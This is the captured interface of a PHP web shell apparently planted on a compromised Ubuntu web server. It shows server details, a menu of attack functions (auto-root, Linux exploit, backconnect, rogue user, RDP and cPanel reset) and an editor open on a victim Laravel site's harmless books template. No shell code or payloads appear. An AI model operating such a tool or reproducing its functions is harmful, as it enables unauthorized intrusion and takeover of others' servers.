Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
new_tlmf /
resources /
views /
frontend /
[ HOME SHELL ]
Name
Size
Permission
Action
about_organization.blade.php
4.05
KB
-rw-rw-r--
aboutus.blade.php
6.68
KB
-rw-rw-r--
advisory_board.blade.php
1.86
KB
-rw-rw-r--
app.blade.php
9.95
KB
-rw-rw-r--
books.blade.php
2.65
KB
-rw-rw-r--
committee.blade.php
2.11
KB
-rw-rw-r--
gallery.blade.php
1.64
KB
-rw-rw-r--
index.blade.php
11.61
KB
-rw-rw-r--
member.blade.php
3.92
KB
-rw-rw-r--
news.blade.php
1.91
KB
-rw-rw-r--
patrons.blade.php
1.77
KB
-rw-rw-r--
publication.blade.php
2.08
KB
-rw-rw-r--
reports.blade.php
2.29
KB
-rw-rw-r--
show_gallery.blade.php
3.34
KB
-rw-rw-r--
show_news.blade.php
1.82
KB
-rw-rw-r--
show_publication.blade.php
3.7
KB
-rw-rw-r--
video.blade.php
1.55
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : books.blade.php
@extends('frontend.app') @section('content') <!-- Header Start --> <div class="container-fluid bg-primary py-5 mb-5 page-header"> <div class="container py-5"> <div class="row justify-content-center"> <div class="col-lg-10 text-center"> <h1 class="display-3 text-white animated slideInDown">Books</h1> <nav aria-label="breadcrumb"> <ol class="breadcrumb justify-content-center"> <li class="breadcrumb-item"><a class="text-white" href="/">Home</a></li> <li class="breadcrumb-item text-white" aria-current="page"> <a href="/publication" class="text-white">Publication</a></li> <li class="breadcrumb-item text-white active" aria-current="page"> <a href="/books">Books</a></li> </ol> </nav> </div> </div> </div> </div> <!-- Header End --> <div class="container"> <div class="text-center"> @if(Request::url() === 'your url here') @endif <h3> @if(Request::url() === 'http://tlmf.org.np/tulsilalamatya/books') Books By Tulsilal AMatya @else Books @endif </h3> </div> <div class = "row" style="margin-bottom: 2rem;"> @foreach ($publications as $data) <div class="col-lg-3 col-md-4 col-sm-6 col-xs-12 d-flex align-items-stretch justify-content-center"> <div class="card" style="margin-top: 1em; overflow: hidden; width: 20rem; "> <a href="/publication/{{$data->id}}"> <div class="text-center" style="margin-left: 1rem; margin-right:1rem;margin-top:1rem; height:300px;"> @if ($data->cover_image == null) <img class="card-img-top" src="/frontend/images/book.png" style="max-height: 300px; width:100%; " alt="{{ $data->title }}"> @else <img class="card-img-top" src="/publication_images/{{$data->cover_image}}" style="max-height: 300px; width:100%" alt="{{ $data->title }}"> @endif </div> {{-- <img class="card-img-top" src="/news_photos/{{$data->image}}" height="200" alt="{{ $data->title }}"> --}} <div class="card-body" style=""> <h5 class="card-title"><strong>{{$data->title}}</strong></h5> </div> </div> </a> </div> @endforeach </div> {{ $publications->links() }} </div> @endsection
Close